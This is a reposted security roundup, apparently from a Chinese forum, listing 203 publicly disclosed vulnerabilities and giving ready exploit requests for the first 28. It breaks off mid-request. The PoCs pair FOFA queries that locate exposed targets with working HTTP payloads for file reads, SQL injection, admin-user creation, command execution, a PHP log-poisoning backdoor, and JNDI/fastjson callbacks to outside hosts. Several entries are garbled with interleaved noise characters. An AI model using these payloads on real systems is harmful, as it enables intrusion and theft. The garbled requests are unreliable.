Public Internet Vulnerability Roundup 202309-202406 (reposted)

Posted on 2024-6-5 14:31:29
Public Internet Vulnerability Roundup 202309-202406

道一安全 2024-06-05 07:41 Beijing

The following article is reproduced from 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of N-day vulnerabilities makes up a large share of attacks in offensive and defensive exercises; we hope this article is of some help to defenders. Defensive teams can use its contents to check their own exposure.

Vulnerability sources: the article covers 203 POCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024, all collected from other public accounts or websites on the Internet and compiled for publication by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few POCs that are too long have been replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal notice: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account's backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version; when using it, press F12 and search for a keyword.

Bookmark this article if you find it useful. You can also follow the official account (网络安全新视界).

Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE O&M security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japan tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋 video management system dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of the password you choose.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the admin backend with the default account admin, send the following request:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained in the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request; the function that gets executed reads a base64-encoded command.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the test target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

# {( [' l3 I6 N24. 用友NC 6.5 accept.jsp任意文件上传5 t' y1 d& U3 t  [3 O9 ]
FOFA:icon_hash="1085941792"
; V4 _* T4 Q& h  A! ~POST /aim/equipmap/accept.jsp HTTP/1.1
7 }9 j" r% m7 ^Host: x.x.x.x
5 `3 R, v) N- E0 nUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
' p% Z; K3 u3 v0 {6 j, q: z# sConnection: close9 X( r0 l, H* `/ _2 {* G
Content-Length: 449
; I8 W  `5 ], ]. m( d" |+ J  Z' JAccept: */*
5 y' X- d( r! gAccept-Encoding: gzip/ u& i2 O* `' H1 R- s/ z, D, g% x1 o
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc3 Y: {5 V8 s1 K* B) B

0 V% ?, s4 f/ L! z2 c1 \5 U- q-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc4 H; i5 ?3 y( G. u! d) ^3 {! E
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"7 m* ~2 M9 Y+ a; j& S
Content-Type: text/plain9 v: O) F. Y/ c( E
: M7 o( \9 ]# b6 |
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
+ Y+ h: `5 m3 N-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
0 x' S% S& G" I; hContent-Disposition: form-data; name="fname") H, ^+ o% _- v! n, F- }! j

4 @; }9 p$ D, W\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
# b3 I5 f1 t0 @7 _4 d-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--$ }$ A. n( F: _7 d
1 X& L. H  E% v  ]* Q- A9 q- G
/ Q9 ?9 O4 |$ [% J" E& ]
25. Yonyou NC (用友NC) registerServlet JNDI remote code execution
FOFA: app="用友-UFIDA-NC"
The dsname parameter is handed to a JNDI lookup. Replace ldap://dnslog with a host you control and watch for the DNS or LDAP callback.

POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

3 q: E  \. Q) y7 T' V5 I26. 用友NC linkVoucher SQL注入8 _% ~2 k- S- B' b, C
FOFA:app="用友-UFIDA-NC"
" d% ^9 `- G# P7 L6 J/ j$ hGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1: R* `7 B6 e# J/ I7 `
Host: your-ip
0 u+ q, C, j( f& L, ^$ V# XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: w3 O1 U% P$ Y& c) l2 CContent-Type: application/x-www-form-urlencoded
4 O* ]  v8 {8 D: SAccept-Encoding: gzip, deflate7 P( P' U( J3 s$ K, Q1 `
Accept: */*
" ]! F6 m, a  t7 EConnection: keep-alive+ X) F1 U; n/ k9 K/ K

! ^& w; n' ?8 J) i; A
, Q! f  v2 D& z27. 用友 NC showcontent SQL注入
6 b, z6 m: g; D5 dFOFA:icon_hash="1085941792"( \6 s, |1 u- K4 H( g
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
& |% n6 [% z0 s5 _( ^* _Host: your-ip
0 Z" x/ g# v6 l8 [" n  S/ U3 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" E* V: H% ^/ I# H7 ]: sAccept-Encoding: identity
% U. l+ U% c, Y" DConnection: close$ d# l% g, T( q/ `2 v. ~
Content-Type: text/xml; charset=utf-8
2 G+ F7 M- r8 {
. P, j8 B5 d3 G$ u, p7 Z2 {/ z9 _6 ^& i+ [7 `$ b/ i) T
28. Yonyou NC (用友NC) grouptemplet arbitrary file upload
FOFA: icon_hash="1085941792"
The groupid and fileType query parameters determine where the file lands and with which extension; for groupid=nc&fileType=jsp the content is written to the path listed after the request. Content-Length is from the original capture.

POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
